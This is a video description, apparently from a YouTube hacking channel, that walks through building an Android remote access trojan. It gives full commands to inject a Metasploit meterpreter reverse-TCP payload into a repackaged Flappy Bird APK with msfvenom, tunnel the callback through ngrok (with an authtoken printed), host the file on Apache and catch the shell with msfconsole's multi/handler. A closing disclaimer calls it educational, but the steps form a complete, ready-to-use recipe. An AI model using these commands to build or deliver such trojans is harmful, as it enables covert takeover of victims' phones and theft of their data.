Android Phone Access with Metasploit and Ngrok , Android RAT from anywhere - বাংলা
Cyber Security Expert
In this video I try to describe how remote access tool Metasploit payload injected into a well known game app and install it android devices for Remote Access Trojan (RAT). This payload can make a backdoor for accessing the phone remotely. The Ngrok give you freedom for remote access your phone from any where.
#mentalist, #androidhacking, #ngrok
👉 All necessary command given bellow : Download flappy bird apk from softnic.com or other reliable site. Then inject exploits to flappybird.apk, flow the instruction.
👉 First Sign up https://ngrok.com/, login to the site and download ngrok compress file to your kali PC. Then unzip following command $tar xzvf ngrok-v3-stable-linux-amd64.tgz
👉 Connect the Ngrok server with authintication token. you can find it at your dashboard of ngrok site. Coppy those code like this and
$./ngrok config add-authtoken 25kXrQGY2j7xboeE3oia3OQPHlw_7gUB9B3GeJwxdKAfP29RQ
Start Ngrok server $./ngrok tcp 4444
👉 Start Http server for local host for transfer file to phone. $sudo service apache2 start
👉 Create payload $sudo msfvenom -x flappy_bird-v1-3.apk --platform android -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=10073 -o flappy-bird-ngrok.apk
👉Transfer this flappy-bird-ngrok.apk to phone through web server or any others medium. Start Metasploit Frame work $sudo msfconsole msf6 use exploit/multi/handler msf6 exploit(multi/handler) set payload android/meterpreter/reverse_tcp msf6 exploit(multi/handler) set LHOST 0.0.0.0 msf6 exploit(multi/handler) set LPORT 4444 msf6 exploit(multi/handler) show options msf6 exploit(multi/handler) run
👉Now your PC is listening mode. Install flappy-bird-ngrok.apk to your phone as like shown as video and enjoy it.
If you face any difficulties please leave a comments here. I will try to solve it inshallah. You are also welcome to request me for making cyber security related any video. You may give likes or share this video if you think it will be help to others.
👉 Useful Links: ❤️Android hack with Metasploit : https://youtu.be/V_bdkfEHY2M ❤️Sharing file between windows and Kali Linux: https://youtu.be/s1TcSxnWzkQ
Thank you for watching. Mizan
⚠️ Disclaimer: Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers. ... https://www.youtube.com/watch?v=uL0uoWrgjZg
47665234 Bytes